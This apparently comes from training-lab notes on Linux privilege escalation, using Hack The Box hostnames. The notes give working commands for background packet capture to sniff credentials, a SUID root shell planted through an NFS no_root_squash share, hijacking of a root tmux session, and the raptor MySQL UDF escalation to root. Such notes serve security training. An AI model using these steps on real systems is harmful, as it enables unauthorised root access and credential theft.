Miscellaneous Techniques
Passive Traffic Capture
If tcpdump is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext.
tcpdump -i 1 -w .d.pcap -s 0 'not tcp port 22' &
Examine data - Tools
Weak NFS Privileges
NFS (2049, 111)showmount -e 10.129.2.12When an NFS volume is created, various options can be set:
root_squash
If the root user is used to access NFS shares, it will be changed to the nfsnobody user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binaries with the SUID bit set.
no_root_squash
Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.
$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash) Create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit
htb@NIX02:~$ cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}gcc shell.c -o shellroot@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shellhtb@NIX02:/tmp$ ./shell
root@NIX02:/tmp# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(htb)References
Example
osboxes@osboxes:~/Desktop$ sudo mount -t nfs 10.129.197.187:/tmp /mnt
osboxes@osboxes:~/Desktop$ cd /tmphtb-student@NIX02:~$ cd /tmp
htb-student@NIX02:/tmp$ cp /bin/bash .
osboxes@osboxes:/mnt$ sudo chown root:root bash
osboxes@osboxes:/mnt$ sudo chmod +s bash
htb-student@NIX02:/tmp$ ./bash -p
Hijacking Tmux Sessions
$ ps aux | grep tmux
root 4806 0.0 0.1 29416 3204 ? Ss 06:27 0:00 tmux -S /shareds new -s debugsess$ ls -la /shareds
srw-rw---- 1 root devs 0 Sep 1 06:27 /shareds$ id
uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)$ tmux -S /shareds
id
uid=0(root) gid=0(root) groups=0(root)MySQL running as root
ps -ef | grep mysql
The MySQL service is running as root
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
# 1 - id
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
# 2- /bin/bash
* mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
* mysql> exit
* /tmp/rootbash -pLast updated